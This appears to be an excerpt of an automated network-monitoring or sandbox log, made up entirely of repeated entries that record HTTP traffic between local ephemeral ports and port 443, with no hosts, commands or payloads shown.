Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49966
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49964
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50040 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49966 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50096 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50108 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50073 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown	Network traffic detected: HTTP traffic on port 50062 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50051 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49947
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 50061 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 50017 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50049 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49897
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 50095 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49897 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50050 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50072 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50059 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50094 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50071 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49906 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50105
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50108
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50107
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50060 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50100
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50102
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50101
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50104
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50103
Source: unknown	Network traffic detected: HTTP traffic on port 50025 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49964 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50001 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown	Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 50093 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50048 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49941 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50082 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50105 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50081 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50070 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50092 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50047 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50053
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50056
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50055
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50058
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50057
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50059
Source: unknown	Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50061
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50060
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50063
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50062
Source: unknown	Network traffic detected: HTTP traffic on port 50068 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50102 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50045 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50065
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50064
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50067
Source: unknown	Network traffic detected: HTTP traffic on port 50091 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50056 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50066
Source: unknown	Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50068
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50070
Source: unknown	Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50072
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50071
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50074
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50073
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50080 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50076
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50075
Source: unknown	Network traffic detected: HTTP traffic on port 50057 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50078
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50077
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50079
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50081
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50080
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50082
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50087
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50089
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50079 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50090
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50092
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50091
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50094
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50093
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50096
Source: unknown	Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50095
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown	Network traffic detected: HTTP traffic on port 50055 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown	Network traffic detected: HTTP traffic on port 50090 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown	Network traffic detected: HTTP traffic on port 50078 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown	Network traffic detected: HTTP traffic on port 49939 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50029
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50023
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50026
Source: unknown	Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50030
Source: unknown	Network traffic detected: HTTP traffic on port 50067 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50103 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50039
Source: unknown	Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50034
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50033
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50036
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50035
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50038
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49940 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50041
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50040
Source: unknown	Network traffic detected: HTTP traffic on port 50066 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50104 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50089 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50033 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50043
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49917 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50042
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50045
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50044
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50047
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50046
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50049
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50048
Source: unknown	Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50050
Source: unknown	Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50052
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50051
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50044 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50042 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50007 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49912 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49958 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49946 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50077 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50053 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49901 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49924 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49947 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50076 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50099 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49992 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50043 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50100 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49969 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50020 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50054 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50065 -> 443
